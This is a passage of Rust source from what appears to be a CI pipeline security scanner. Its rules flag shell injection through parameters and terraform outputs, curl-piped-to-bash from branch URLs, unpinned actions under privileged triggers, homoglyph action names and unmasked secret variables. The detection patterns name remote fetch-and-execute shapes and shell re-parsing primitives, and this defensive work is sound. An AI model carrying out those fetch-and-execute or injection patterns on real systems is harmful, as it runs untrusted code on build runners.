2675    let free_form: Vec<&str> = graph
2676        .parameters
2677        .iter()
2678        .filter(|(_, spec)| {
2679            !spec.has_values_allowlist
2680                && (spec.param_type.is_empty() || spec.param_type.eq_ignore_ascii_case("string"))
2681        })
2682        .map(|(name, _)| name.as_str())
2683        .collect();
2684
2685    if free_form.is_empty() {
2686        return Vec::new();
2687    }
2688
2689    let mut findings = Vec::new();
2690
2691    for step in graph.nodes_of_kind(NodeKind::Step) {
2692        let body = match step.metadata.get(META_SCRIPT_BODY) {
2693            Some(b) if !b.is_empty() => b,
2694            _ => continue,
2695        };
2696
2697        // Find every free-form parameter that appears interpolated in the
2698        // script body. Match both `${{ parameters.X }}` and `${{parameters.X}}`.
2699        let mut hits: Vec<&str> = Vec::new();
2700        for &name in &free_form {
2701            let needle_a = format!("${{{{ parameters.{name} }}}}");
2702            let needle_b = format!("${{{{parameters.{name}}}}}");
2703            if body.contains(&needle_a) || body.contains(&needle_b) {
2704                hits.push(name);
2705            }
2706        }
2707
2708        if hits.is_empty() {
2709            continue;
2710        }
2711
2712        hits.sort();
2713        hits.dedup();
2714        let names = hits.join(", ");
2715
2716        findings.push(Finding {
2717            severity: Severity::Medium,
2718            category: FindingCategory::ParameterInterpolationIntoShell,
2719            path: None,
2720            nodes_involved: vec![step.id],
2721            message: format!(
2722                "Step '{}' interpolates free-form string parameter(s) [{}] into an inline script — anyone with 'queue build' permission can inject shell commands",
2723                step.name, names
2724            ),
2725            recommendation: Recommendation::Manual {
2726                action: "Add a `values:` allowlist to the parameter declaration to constrain accepted inputs, OR pass the parameter through the step's `env:` block so the runtime quotes it as a shell variable instead of YAML-interpolating raw text.".into(),
2727            },
2728            source: FindingSource::BuiltIn,
2729                extras: FindingExtras::default(),
2730});
2731    }
2732
2733    findings
2734}
2735
2736/// Rule: ADO terraform-output → `task.setvariable` → downstream shell
2737/// expansion, a 2-step injection chain.
2738///
2739/// **Phase 1 (capture step):** an inline ADO script body
2740/// (`META_SCRIPT_BODY`) that contains BOTH:
2741///   - a "terraform output capture" signal — either a literal `terraform
2742///     output` CLI invocation (with or without `-raw <name>` / `-json`),
2743///     OR a reference to a `TF_OUT_*` env var (the standard naming
2744///     convention for env vars sourced from a `TerraformCLI@*`
2745///     `command: output` task), AND
2746///   - a `##vso[task.setvariable variable=NAME ...]VALUE` directive.
2747///
2748/// **Phase 2 (sink step):** a *later* Step in the SAME job (matched via
2749/// `META_JOB_NAME`) whose script body expands `$(NAME)` in
2750/// shell-expansion position, where "shell-expansion position" is any of:
2751///   - inside `bash -c "..."` / `bash -c '...'`
2752///   - inside `eval "..."` / `eval '...'` / `eval $(...)`
2753///   - inside command substitution `$(... $(NAME) ...)`
2754///   - PowerShell `-split` / `Invoke-Command` / `Invoke-Expression` / `iex`
2755///     in the same script
2756///   - bare unquoted `$(NAME)` as a command word (line-leading)
2757///
2758/// **Severity: High.** Terraform state/outputs are often controlled by
2759/// remote backends (S3 bucket, Azure Storage) whose IAM may have weaker
2760/// access controls than the pipeline itself. The `task.setvariable` hop
2761/// launders attacker-controlled state through pipeline-variable space —
2762/// existing rules see only the in-step view.
2763pub fn terraform_output_via_setvariable_shell_expansion(graph: &AuthorityGraph) -> Vec<Finding> {
2764    // Step 0: collect every Step (in graph insertion order, which matches
2765    // YAML order) that carries a non-empty script body. Group by job name.
2766    struct StepInfo<'a> {
2767        id: NodeId,
2768        name: &'a str,
2769        body: &'a str,
2770    }
2771    let mut by_job: std::collections::BTreeMap<&str, Vec<StepInfo<'_>>> =
2772        std::collections::BTreeMap::new();
2773    for step in graph.nodes_of_kind(NodeKind::Step) {
2774        let body = match step.metadata.get(META_SCRIPT_BODY) {
2775            Some(b) if !b.is_empty() => b.as_str(),
2776            _ => continue,
2777        };
2778        let job = step
2779            .metadata
2780            .get(META_JOB_NAME)
2781            .map(String::as_str)
2782            .unwrap_or("");
2783        by_job.entry(job).or_default().push(StepInfo {
2784            id: step.id,
2785            name: step.name.as_str(),
2786            body,
2787        });
2788    }
2789
2790    let mut findings = Vec::new();
2791
2792    for (_job_name, steps) in by_job.iter() {
2793        // Phase 1: scan every step in this job for capture+setvariable.
2794        // Each capture step yields zero-or-more (variable_name) outputs.
2795        let captures: Vec<(usize, Vec<String>)> = steps
2796            .iter()
2797            .enumerate()
2798            .filter_map(|(idx, s)| {
2799                let vars = capture_phase_variables(s.body);
2800                if vars.is_empty() {
2801                    None
2802                } else {
2803                    Some((idx, vars))
2804                }
2805            })
2806            .collect();
2807
2808        if captures.is_empty() {
2809            continue;
2810        }
2811
2812        // Phase 2: for each capture step, look at all later steps in the
2813        // same job. For each later step, find any captured variable name
2814        // whose `$(NAME)` reference appears in shell-expansion position
2815        // within that later step's body.
2816        for (cap_idx, vars) in &captures {
2817            for later_idx in (cap_idx + 1)..steps.len() {
2818                let sink = &steps[later_idx];
2819                let mut hits: Vec<&str> = Vec::new();
2820                for var in vars {
2821                    if expansion_in_shell_position(sink.body, var) {
2822                        hits.push(var.as_str());
2823                    }
2824                }
2825                if hits.is_empty() {
2826                    continue;
2827                }
2828                hits.sort();
2829                hits.dedup();
2830                let cap = &steps[*cap_idx];
2831                let names = hits.join(", ");
2832                findings.push(Finding {
2833                    severity: Severity::High,
2834                    category:
2835                        FindingCategory::TerraformOutputViaSetvariableShellExpansion,
2836                    path: None,
2837                    nodes_involved: vec![cap.id, sink.id],
2838                    message: format!(
2839                        "Step '{}' captures terraform output and emits ##vso[task.setvariable] for [{}]; later step '{}' (same job) expands $({}) in shell-expansion position — attacker control of terraform state ({{S3, Azure Storage}} backend) becomes shell injection across the pipeline-variable hop",
2840                        cap.name,
2841                        names,
2842                        sink.name,
2843                        hits[0],
2844                    ),
2845                    recommendation: Recommendation::Manual {
2846                        action: "Pass the captured value through the downstream step's `env:` block (so the runtime quotes it as a shell variable: `env: { GDSVMS: $(gdsvms) }` then `$GDSVMS` in script) instead of YAML-interpolating `$(VAR)` into the script body. Where the value is structured (comma list of VM names), validate the shape — e.g. `[[ \"$VAR\" =~ ^[a-zA-Z0-9._,-]+$ ]]` — before splitting/looping. Consider lock-down of the terraform state backend (S3 bucket policy, Azure Storage RBAC) so untrusted parties cannot rewrite outputs.".into(),
2847                    },
2848                    source: FindingSource::BuiltIn,
2849                    extras: FindingExtras::default(),
2850                });
2851            }
2852        }
2853    }
2854
2855    findings
2856}
2857
2858/// Phase-1 helper: given an inline-script body, return the list of
2859/// pipeline-variable names that the body sets via
2860/// `##vso[task.setvariable variable=NAME ...]` *only when* the body also
2861/// contains a "terraform output capture" signal.
2862///
2863/// We do not attempt to data-flow-link the captured value to the
2864/// `setvariable` directive — the proximity within a single inline script
2865/// is the operative signal. The two corpus exemplars
2866/// (`sharedservice-solarwinds` and `userapp-mvit-prd`) both pair the
2867/// capture and the setvariable inside the same PowerShell block.
2868fn capture_phase_variables(body: &str) -> Vec<String> {
2869    if !body_has_terraform_output_capture(body) {
2870        return Vec::new();
2871    }
2872    setvariable_names_in(body)
2873}
2874
/// True iff the body contains a terraform-output capture signal.
///
/// All markers are matched case-sensitively as plain substrings:
///   - `terraform output` — the literal CLI invocation, with or without
///     subcommand args (the terraform CLI is always lowercase);
///   - `$env:TF_OUT_` / `${env:TF_OUT_` — PowerShell references to the
///     `TF_OUT_<name>` env vars written by the `TerraformCLI@*` task
///     family's `command: output`;
///   - `$TF_OUT_` / `${TF_OUT_` — the POSIX-shell forms. Because the sigil
///     is part of the marker, a bare `MY_TF_OUT_X` does not match.
fn body_has_terraform_output_capture(body: &str) -> bool {
    const CAPTURE_MARKERS: [&str; 5] = [
        "terraform output",
        "$env:TF_OUT_",
        "${env:TF_OUT_",
        "$TF_OUT_",
        "${TF_OUT_",
    ];

    CAPTURE_MARKERS.iter().any(|&marker| body.contains(marker))
}
2899
/// Extract the variable names set by every
/// `##vso[task.setvariable variable=NAME ...]` directive in the body.
///
/// The directive prefix is matched ASCII-case-insensitively (so
/// `##vso[task.setVariable variable=...` is recognised too), in line with
/// the case-insensitive `##vso[task.setvariable` check in
/// `script_launders_spn_token`. The extracted name keeps its original
/// casing.
///
/// A name ends at the first `;`, `]` or whitespace character. Names that are
/// empty or contain anything other than ASCII alphanumerics, `_` or `.`
/// (for example an interpolated `$(x)`) are skipped.
///
/// Returns the names sorted and de-duplicated.
fn setvariable_names_in(body: &str) -> Vec<String> {
    const DIRECTIVE: &str = "##vso[task.setvariable variable=";

    // ASCII-only case folding leaves every byte offset unchanged, so
    // positions found in `folded` can be used to slice `body` directly.
    let folded = body.to_ascii_lowercase();

    let mut names: Vec<String> = Vec::new();
    let mut cursor = 0;
    while let Some(rel) = folded[cursor..].find(DIRECTIVE) {
        let start = cursor + rel + DIRECTIVE.len();
        let tail = &body[start..];
        let end = tail
            .find(|c: char| c == ';' || c == ']' || c.is_whitespace())
            .unwrap_or(tail.len());
        let name = &tail[..end];
        if !name.is_empty()
            && name
                .chars()
                .all(|c| c.is_ascii_alphanumeric() || c == '_' || c == '.')
        {
            names.push(name.to_string());
        }
        // Resume scanning after the name just examined.
        cursor = start + end;
    }

    names.sort();
    names.dedup();
    names
}
2927
/// Phase-2 predicate: does `body` reference `$(name)` in a shell-expansion
/// position? "Shell-expansion position" means the value will be parsed by
/// a shell or PowerShell interpreter at runtime, rather than being fed
/// into a function/cmdlet that quotes its arguments.
///
/// Returns `false` immediately when `$(name)` does not occur in `body`.
/// Otherwise returns `true` when any of these heuristics fires:
///
/// 1. the body contains a re-parsing primitive anywhere (`bash -c`, `eval `,
///    `Invoke-Expression`, `-split`, ...);
/// 2. some occurrence of `$(name)` is preceded, on its own line, by more
///    `$(` openers than `)` closers, i.e. it sits inside another command
///    substitution;
/// 3. a line starts (after leading whitespace) with `$(name)`, so the value
///    is parsed as the command itself.
fn expansion_in_shell_position(body: &str, name: &str) -> bool {
    let needle = format!("$({name})");
    if !body.contains(&needle) {
        return false;
    }

    // Cheap whole-body checks: if the script contains any of these
    // primitives anywhere, an interpolation of `$(name)` elsewhere in the
    // same script is at risk. The `sharedservice-solarwinds` corpus
    // exemplar exercises the `-split` + `Invoke-Command` + foreach branch
    // — all three signals fire.
    const RISKY_PRIMITIVES: &[&str] = &[
        "bash -c",
        "sh -c",
        "eval ",
        "Invoke-Expression",
        " iex ",
        "iex(",
        "iex (",
        "Invoke-Command",
        "-split",
    ];
    if RISKY_PRIMITIVES.iter().any(|p| body.contains(p)) {
        return true;
    }

    body.lines().any(|line| {
        // Bare line-leading reference: `$(NAME) ...` — the value is parsed
        // as a command line.
        if line.trim_start().starts_with(&needle) {
            return true;
        }
        // Nested command substitution: `$(... $(name) ...)`. ADO's
        // `$(macro)` and POSIX `$(cmd)` share the same surface syntax, so an
        // unclosed `$(` before the reference means the sink is parsed inside
        // another substitution. Every occurrence on the line is examined —
        // a harmless first reference must not mask a nested later one.
        // Naive but adequate for inline-script bodies (no real balancing).
        line.match_indices(needle.as_str()).any(|(pos, _)| {
            let prefix = &line[..pos];
            prefix.matches("$(").count() > prefix.matches(')').count()
        })
    })
}
2987
// ── runtime_script_fetched_from_floating_url ──────────────────
//
// Detect `run:` blocks that download a remote script from a non-pinned URL
// and pipe it directly to a shell interpreter. This is a pure HTTP supply-chain
// vector — neither `unpinned_action` (which inspects `uses:`) nor
// `floating_image` (containers) covers it.
//
// Detection primitive (a single line must show both):
//   1. shell-style fetch+execute: `curl … | bash`, `wget … | sh`,
//      `bash <(curl …)`, or `deno run https://…`
//   2. a mutable URL marker: `refs/heads/`, `/HEAD/`, `/main/`, `/master/`,
//      `/develop/`, `/trunk/`, or `/latest/`.
//
// Severity: High (one upstream commit lands code on every consumer).

/// Returns `true` when some line of `body` both executes remotely fetched
/// code (pipe into `bash`/`sh`, process substitution of `curl`/`wget`, or
/// `deno run http(s)://…`) and carries a mutable-URL marker.
///
/// The check is line-local: a fetch whose pipe sits on a continuation line
/// is not correlated with the URL on the previous line.
fn body_has_pipe_to_shell_with_floating_url(body: &str) -> bool {
    // Cheap pre-filter to keep the regex-free scan fast: without a fetcher
    // or a remote `deno run` nothing below can match.
    let has_fetcher = body.contains("curl") || body.contains("wget");
    let has_deno_remote =
        body.contains("deno run http://") || body.contains("deno run https://");
    if !has_fetcher && !has_deno_remote {
        return false;
    }

    body.lines().any(|line| {
        (line_pipes_into_shell(line) || line_runs_remote_deno(line)) && line_url_is_mutable(line)
    })
}

/// Does `line` feed fetched content to `bash`/`sh`, either through a pipe or
/// through process substitution (`<(curl …)` / `<(wget …)`)?
///
/// The command after `|` must be exactly `bash` or `sh` — i.e. followed by
/// end-of-line or a character that cannot continue a command name — so that
/// `| sha256sum`, `| shasum` or `| shuf` are not mistaken for a shell.
fn line_pipes_into_shell(line: &str) -> bool {
    if line.contains("<(curl") || line.contains("<(wget") {
        return true;
    }
    let continues_command_name =
        |c: char| c.is_ascii_alphanumeric() || matches!(c, '_' | '-' | '.');
    line.split('|').skip(1).any(|segment| {
        let command = segment.trim_start();
        ["bash", "sh"]
            .iter()
            .any(|shell| match command.strip_prefix(shell) {
                Some(rest) => !rest.starts_with(continues_command_name),
                None => false,
            })
    })
}

/// Does `line` run a Deno module straight from an HTTP(S) URL?
fn line_runs_remote_deno(line: &str) -> bool {
    line.contains("deno run http://") || line.contains("deno run https://")
}

/// Returns `true` when `line` contains a path segment that denotes a moving
/// target (branch ref, `HEAD`, or `latest`).
///
/// The marker list is the conservative core: flagging every URL without a
/// version-like segment would catch more but sacrifices precision.
fn line_url_is_mutable(line: &str) -> bool {
    const MUTABLE_PATHS: &[&str] = &[
        "refs/heads/",
        "/HEAD/",
        "/main/",
        "/master/",
        "/develop/",
        "/trunk/",
        "/latest/",
    ];
    MUTABLE_PATHS.iter().any(|marker| line.contains(marker))
}
3065
3066/// Rule: a `run:` step pipes a remotely-fetched script into a shell, where
3067/// the URL is pinned to a mutable branch ref. The remote host's branch tip
3068/// becomes a write-anywhere primitive on the runner.
3069///
3070/// Severity: High.
3071pub fn runtime_script_fetched_from_floating_url(graph: &AuthorityGraph) -> Vec<Finding> {
3072    let mut findings = Vec::new();
3073
3074    for step in graph.nodes_of_kind(NodeKind::Step) {
3075        let body = match step.metadata.get(META_SCRIPT_BODY) {
3076            Some(b) if !b.is_empty() => b,
3077            _ => continue,
3078        };
3079
3080        if !body_has_pipe_to_shell_with_floating_url(body) {
3081            continue;
3082        }
3083
3084        findings.push(Finding {
3085            severity: Severity::High,
3086            category: FindingCategory::RuntimeScriptFetchedFromFloatingUrl,
3087            path: None,
3088            nodes_involved: vec![step.id],
3089            message: format!(
3090                "Step '{}' downloads and executes a script from a mutable URL (curl|bash, wget|sh, or `deno run` against a branch ref) — whoever controls that branch executes arbitrary code on the runner",
3091                step.name
3092            ),
3093            recommendation: Recommendation::Manual {
3094                action: "Pin the URL to a release tag or commit SHA (e.g. .../v1.2.3/install.sh) and verify the download against a known checksum before executing it. Avoid `curl … | bash` entirely where possible — fetch to a file, inspect, then run.".into(),
3095            },
3096            source: FindingSource::BuiltIn,
3097                extras: FindingExtras::default(),
3098});
3099    }
3100
3101    findings
3102}
3103
3104// ── pr_trigger_with_floating_action_ref ────────────────────────
3105//
3106// Detect the high-severity conjunction: workflow runs in privileged base-repo
3107// context (`pull_request_target` / `issue_comment` / `workflow_run`) AND uses
3108// at least one action by mutable ref (not SHA). Either condition alone is a
3109// finding from another rule; the conjunction is critical because the trigger
3110// grants write-token authority *and* the floating action lets an attacker
3111// substitute the executed code.
/// Returns `true` when `trigger` — a single trigger name or a
/// comma-separated list, as stored under `META_TRIGGER` — contains
/// `pull_request_target`, `issue_comment`, or `workflow_run`.
///
/// Entries are compared after trimming surrounding whitespace; matching is
/// exact and case-sensitive.
fn trigger_is_privileged_pr_class(trigger: &str) -> bool {
    const PRIVILEGED: [&str; 3] = ["pull_request_target", "issue_comment", "workflow_run"];
    trigger
        .split(',')
        .map(str::trim)
        .any(|event| PRIVILEGED.contains(&event))
}
3119
3120/// Rule: privileged PR-class trigger combined with a non-SHA-pinned action ref.
3121///
3122/// Severity: Critical (full repo write token + attacker-controlled action code).
3123pub fn pr_trigger_with_floating_action_ref(graph: &AuthorityGraph) -> Vec<Finding> {
3124    let trigger = match graph.metadata.get(META_TRIGGER) {
3125        Some(t) => t.as_str(),
3126        None => return Vec::new(),
3127    };
3128    if !trigger_is_privileged_pr_class(trigger) {
3129        return Vec::new();
3130    }
3131
3132    let mut findings = Vec::new();
3133    let mut seen = std::collections::HashSet::new();
3134
3135    for image in graph.nodes_of_kind(NodeKind::Image) {
3136        // Skip first-party (local actions, self-hosted runner labels).
3137        if image.trust_zone == TrustZone::FirstParty {
3138            continue;
3139        }
3140        // Skip container images (covered by floating_image).
3141        if image
3142            .metadata
3143            .get(META_CONTAINER)
3144            .map(|v| v == "true")
3145            .unwrap_or(false)
3146        {
3147            continue;
3148        }
3149        // Skip self-hosted-runner Image nodes (those are FirstParty anyway,
3150        // but be defensive against future refactors).
3151        if image.metadata.contains_key(META_SELF_HOSTED) {
3152            continue;
3153        }
3154        // Already SHA-pinned (semantically valid) → safe.
3155        if is_pin_semantically_valid(&image.name) {
3156            continue;
3157        }
3158        // Dedupe per action reference.
3159        if !seen.insert(&image.name) {
3160            continue;
3161        }
3162
3163        findings.push(Finding {
3164            severity: Severity::Critical,
3165            category: FindingCategory::PrTriggerWithFloatingActionRef,
3166            path: None,
3167            nodes_involved: vec![image.id],
3168            message: format!(
3169                "Workflow trigger '{trigger}' runs in privileged base-repo context and step uses unpinned action '{}' — anyone who can push to that action's branch executes arbitrary code with full repo write token",
3170                image.name
3171            ),
3172            recommendation: Recommendation::PinAction {
3173                current: image.name.clone(),
3174                pinned: format!(
3175                    "{}@<sha256-digest>",
3176                    image.name.split('@').next().unwrap_or(&image.name)
3177                ),
3178            },
3179            source: FindingSource::BuiltIn,
3180                extras: FindingExtras::default(),
3181});
3182    }
3183
3184    findings
3185}
3186
3187// ── homoglyph_in_action_ref ──────────────────────────────────
3188//
3189// Detect `uses:` action references containing non-ASCII characters.
3190// Legitimate action references (owner/repo@ref) are purely ASCII.
3191// Non-ASCII characters indicate a possible Unicode confusable / homoglyph
3192// attack where a malicious action name visually impersonates a trusted one.
3193
3194/// Rule G2: action reference contains non-ASCII characters (possible homoglyph).
3195///
3196/// Iterates every `Image` node in the graph (which represent `uses:` action
3197/// refs) and flags any whose name contains at least one non-ASCII code point.
3198/// Severity: High — potential supply-chain impersonation attack.
3199pub fn check_homoglyph_in_action_ref(graph: &AuthorityGraph) -> Vec<Finding> {
3200    let platform = graph.metadata.get(META_PLATFORM).map(|s| s.as_str());
3201    if platform != Some("github-actions") {
3202        return Vec::new();
3203    }
3204
3205    let mut findings = Vec::new();
3206
3207    for image in graph.nodes_of_kind(NodeKind::Image) {
3208        if image.name.is_ascii() {
3209            continue;
3210        }
3211
3212        // Collect the offending non-ASCII characters for the message.
3213        let bad_chars: Vec<String> = image
3214            .name
3215            .chars()
3216            .filter(|c| !c.is_ascii())
3217            .map(|c| format!("U+{:04X} '{}'", c as u32, c))
3218            .collect();
3219        let char_list = bad_chars.join(", ");
3220
3221        findings.push(Finding {
3222            severity: Severity::High,
3223            category: FindingCategory::HomoglyphInActionRef,
3224            path: None,
3225            nodes_involved: vec![image.id],
3226            message: format!(
3227                "Action reference '{}' contains non-ASCII character(s) (possible homoglyph/confusable): {}",
3228                image.name, char_list
3229            ),
3230            recommendation: Recommendation::Manual {
3231                action: "Replace the action reference with the genuine ASCII action name. Verify the action owner/repo on github.com and ensure every character in the `uses:` field is plain ASCII.".into(),
3232            },
3233            source: FindingSource::BuiltIn,
3234            extras: FindingExtras::default(),
3235        });
3236    }
3237
3238    findings
3239}
3240
3241// ── untrusted_api_response_to_env_sink ────────────────────────
3242//
// Detect workflows running under a privileged trigger (`workflow_run`,
// `pull_request_target`, `issue_comment`) that capture an external API
// response (gh CLI, curl against api.github.com) and write it into a GHA
// environment file (`$GITHUB_ENV`, `$GITHUB_OUTPUT`, `$GITHUB_PATH`). A
// poisoned API field (branch name, PR title, commit message) injects
// environment variables into every subsequent step in the same job.
/// Heuristic: does `body` push a GitHub API response into one of the GHA
/// gate files (`$GITHUB_ENV`, `$GITHUB_OUTPUT`, `$GITHUB_PATH`)?
///
/// Without dataflow analysis this is approximated by proximity: the function
/// returns `true` when a line mentioning a gate file is at most six lines
/// after (or on the same line as) the most recent line mentioning an API
/// source (`gh pr view`, `gh pr list`, `gh api `, `gh issue view`,
/// `api.github.com`). The same-line case is the canonical corpus idiom, e.g.
/// `gh pr view --jq '"PR_NUMBER=\(.number)"' >> $GITHUB_ENV`.
fn body_writes_api_response_to_env_sink(body: &str) -> bool {
    /// Spellings of the gate-file redirect targets.
    const ENV_SINKS: [&str; 6] = [
        "$GITHUB_ENV",
        "${GITHUB_ENV}",
        "$GITHUB_OUTPUT",
        "${GITHUB_OUTPUT}",
        "$GITHUB_PATH",
        "${GITHUB_PATH}",
    ];
    /// gh CLI sub-commands and the REST host treated as API sources.
    const API_SOURCES: [&str; 5] = [
        "gh pr view",
        "gh pr list",
        "gh api ",
        "gh issue view",
        "api.github.com",
    ];
    /// Maximum line distance between the API call and the sink write.
    const MAX_LINE_GAP: usize = 6;

    fn mentions_any(text: &str, needles: &[&str]) -> bool {
        needles.iter().any(|needle| text.contains(needle))
    }

    // Whole-body pre-filter: both a sink and a source must exist somewhere.
    if !mentions_any(body, &ENV_SINKS) || !mentions_any(body, &API_SOURCES) {
        return false;
    }

    // Single pass. The source check runs before the sink check, so a line
    // containing both yields a gap of zero and matches immediately.
    let mut latest_api_line: Option<usize> = None;
    for (idx, line) in body.lines().enumerate() {
        if mentions_any(line, &API_SOURCES) {
            latest_api_line = Some(idx);
        }
        if !mentions_any(line, &ENV_SINKS) {
            continue;
        }
        if let Some(api_idx) = latest_api_line {
            // `api_idx <= idx` always holds here.
            if idx - api_idx <= MAX_LINE_GAP {
                return true;
            }
        }
    }

    false
}
3322
3323/// Rule: workflow_run-triggered workflow writes an API response value to the
3324/// GHA environment gate. Branch name / PR title in the response can carry
3325/// newline-injected env-var assignments.
3326///
3327/// Severity: High.
3328pub fn untrusted_api_response_to_env_sink(graph: &AuthorityGraph) -> Vec<Finding> {
3329    let trigger = match graph.metadata.get(META_TRIGGER) {
3330        Some(t) => t.as_str(),
3331        None => return Vec::new(),
3332    };
3333    let trigger_in_scope = trigger.split(',').any(|t| {
3334        let t = t.trim();
3335        matches!(t, "workflow_run" | "pull_request_target" | "issue_comment")
3336    });
3337    if !trigger_in_scope {
3338        return Vec::new();
3339    }
3340
3341    let mut findings = Vec::new();
3342
3343    for step in graph.nodes_of_kind(NodeKind::Step) {
3344        let body = match step.metadata.get(META_SCRIPT_BODY) {
3345            Some(b) if !b.is_empty() => b,
3346            _ => continue,
3347        };
3348
3349        if !body_writes_api_response_to_env_sink(body) {
3350            continue;
3351        }
3352
3353        findings.push(Finding {
3354            severity: Severity::High,
3355            category: FindingCategory::UntrustedApiResponseToEnvSink,
3356            path: None,
3357            nodes_involved: vec![step.id],
3358            message: format!(
3359                "Step '{}' captures a GitHub API response (gh CLI or api.github.com) into the GHA env gate ($GITHUB_ENV/$GITHUB_OUTPUT/$GITHUB_PATH) under trigger '{trigger}' — attacker-influenced fields (branch name, PR title) can inject environment variables for every subsequent step in the same job",
3360                step.name
3361            ),
3362            recommendation: Recommendation::Manual {
3363                action: "Validate the API field with a strict regex before redirecting (e.g. only `[0-9]+` for a PR number), or write only known-numeric fields. Never pipe free-form fields like branch name or PR title directly into $GITHUB_ENV.".into(),
3364            },
3365            source: FindingSource::BuiltIn,
3366            extras: FindingExtras::default(),
3367        });
3368    }
3369
3370    findings
3371}
3372
3373// ── pr_build_pushes_image_with_floating_credentials ────────────
3374//
3375// Detect: workflow triggered by a PR-class event uses a container-registry
3376// login action that is NOT SHA-pinned. The login action receives credentials
3377// (OIDC token or static registry secret) — a compromise of the action's
3378// branch lets an attacker exfiltrate them.
/// Returns `true` when `action` (a `uses:` reference, with or without an
/// `@ref` suffix) names a known registry/cloud login action.
///
/// Only the part before the first `@` is considered. It is compared
/// ASCII-case-insensitively, so `Azure/login@v2` and `azure/login@v2` are
/// treated alike. A reference matches when it equals one of the well-known
/// actions or ends with one of the conventional `/login-to-*` /
/// `/dockerhub-login` suffixes.
fn is_registry_login_action(action: &str) -> bool {
    const KNOWN_ACTIONS: &[&str] = &[
        "docker/login-action",
        "aws-actions/amazon-ecr-login",
        "aws-actions/configure-aws-credentials",
        "azure/docker-login",
        "azure/login",
        "google-github-actions/auth",
        "google-github-actions/setup-gcloud",
    ];
    const KNOWN_SUFFIXES: &[&str] = &[
        "/login-to-gar",
        "/dockerhub-login",
        "/login-to-ecr",
        "/login-to-acr",
    ];

    let bare = action
        .split('@')
        .next()
        .unwrap_or(action)
        .to_ascii_lowercase();

    KNOWN_ACTIONS.contains(&bare.as_str())
        || KNOWN_SUFFIXES
            .iter()
            .any(|suffix| bare.ends_with(*suffix))
}
3395
/// Returns `true` when `trigger` — a single trigger name or a
/// comma-separated list — contains `pull_request` or `pull_request_target`.
/// Both count as PR-class; entries are trimmed and matched exactly.
fn trigger_includes_pull_request(trigger: &str) -> bool {
    trigger
        .split(',')
        .map(str::trim)
        .any(|event| matches!(event, "pull_request" | "pull_request_target"))
}
3403
3404/// Rule: PR-triggered workflow uses a non-SHA-pinned container-registry login
3405/// action. Compound vector: floating action holds registry creds + PR-controlled
3406/// image content reaches a shared registry.
3407///
3408/// Severity: High.
3409pub fn pr_build_pushes_image_with_floating_credentials(graph: &AuthorityGraph) -> Vec<Finding> {
3410    let trigger = match graph.metadata.get(META_TRIGGER) {
3411        Some(t) => t.as_str(),
3412        None => return Vec::new(),
3413    };
3414    if !trigger_includes_pull_request(trigger) {
3415        return Vec::new();
3416    }
3417
3418    let mut findings = Vec::new();
3419    let mut seen = std::collections::HashSet::new();
3420
3421    for image in graph.nodes_of_kind(NodeKind::Image) {
3422        if image.trust_zone == TrustZone::FirstParty {
3423            continue;
3424        }
3425        if image
3426            .metadata
3427            .get(META_CONTAINER)
3428            .map(|v| v == "true")
3429            .unwrap_or(false)
3430        {
3431            continue;
3432        }
3433        if !is_registry_login_action(&image.name) {
3434            continue;
3435        }
3436        if is_pin_semantically_valid(&image.name) {
3437            continue;
3438        }
3439        if !seen.insert(&image.name) {
3440            continue;
3441        }
3442
3443        findings.push(Finding {
3444            severity: Severity::High,
3445            category: FindingCategory::PrBuildPushesImageWithFloatingCredentials,
3446            path: None,
3447            nodes_involved: vec![image.id],
3448            message: format!(
3449                "PR-triggered workflow ('{trigger}') uses unpinned registry-login action '{}' — a compromise of that action's branch exfiltrates registry credentials or OIDC tokens, and any PR-controlled image content then reaches a shared registry",
3450                image.name
3451            ),
3452            recommendation: Recommendation::PinAction {
3453                current: image.name.clone(),
3454                pinned: format!(
3455                    "{}@<sha256-digest>",
3456                    image.name.split('@').next().unwrap_or(&image.name)
3457                ),
3458            },
3459            source: FindingSource::BuiltIn,
3460            extras: FindingExtras::default(),
3461        });
3462    }
3463
3464    findings
3465}
3466
3467/// Rule: ADO `##vso[task.setvariable]` with a sensitive-named variable
3468/// that omits `issecret=true` (either `issecret=false` or no `issecret`
3469/// flag at all). Without the flag the variable value is printed in
3470/// plaintext to the pipeline log and is not masked in downstream step
3471/// output.
3472///
3473/// Detection (per Step):
3474///   * `META_PLATFORM == "azure-devops"` (gates GHA/GitLab out)
3475///   * Step carries a non-empty `META_SCRIPT_BODY`
3476///   * Body contains `##vso[task.setvariable variable=NAME ...]` where
3477///     NAME (case-insensitive) matches a sensitive keyword: `password`,
3478///     `passwd`, `token`, `secret`, `key`, `credential`, `cert`,
3479///     `apikey`, `auth`
3480///   * The directive does NOT contain `issecret=true` (case-insensitive)
3481///     between `variable=NAME` and the closing `]`
3482///
3483/// Severity: High.
3484pub fn setvariable_issecret_false(graph: &AuthorityGraph) -> Vec<Finding> {
3485    if !graph_is_platform(graph, "azure-devops") {
3486        return Vec::new();
3487    }
3488
3489    const SENSITIVE_KEYWORDS: &[&str] = &[
3490        "password",
3491        "passwd",
3492        "token",
3493        "secret",
3494        "key",
3495        "credential",
3496        "cert",
3497        // "api_key" omitted: tokenizer splits on '_', so this keyword can never
3498        // match a single token — "key" already covers AZURE_API_KEY etc.
3499        "apikey",
3500        "auth",
3501    ];
3502
3503    let needle = "##vso[task.setvariable variable=";
3504
3505    let mut findings = Vec::new();
3506
3507    for step in graph.nodes_of_kind(NodeKind::Step) {
3508        let body = match step.metadata.get(META_SCRIPT_BODY) {
3509            Some(b) if !b.trim().is_empty() => b,
3510            _ => continue,
3511        };
3512
3513        let lower = body.to_lowercase();
3514        let mut cursor = 0;
3515
3516        while let Some(rel) = lower[cursor..].find(needle) {
3517            let start = cursor + rel + needle.len();
3518            let tail = &lower[start..];
3519
3520            // Extract variable name (terminated by `;`, `]`, or whitespace).
3521            let name_end = tail
3522                .find(|c: char| c == ';' || c == ']' || c.is_whitespace())
3523                .unwrap_or(tail.len());
3524            let var_name = &tail[..name_end];
3525
3526            if var_name.is_empty() {
3527                cursor = start + name_end;
3528                continue;
3529            }
3530
3531            // Token-split on `_`/`-` so "key" matches STORAGE_ACCOUNT_KEY but not "keyvaultname".
3532            let is_sensitive = var_name
3533                .split(['_', '-'])
3534                .any(|tok| SENSITIVE_KEYWORDS.contains(&tok));
3535
3536            if !is_sensitive {
3537                cursor = start + name_end;
3538                continue;
3539            }
3540
3541            // Grab the rest of the directive up to `]` to check for issecret.
3542            let directive_end = tail.find(']').unwrap_or(tail.len());
3543            let directive_tail = &tail[..directive_end];
3544            let has_issecret_true = directive_tail.contains("issecret=true");
3545
3546            if !has_issecret_true {
3547                // Recover the original-case variable name from the body.
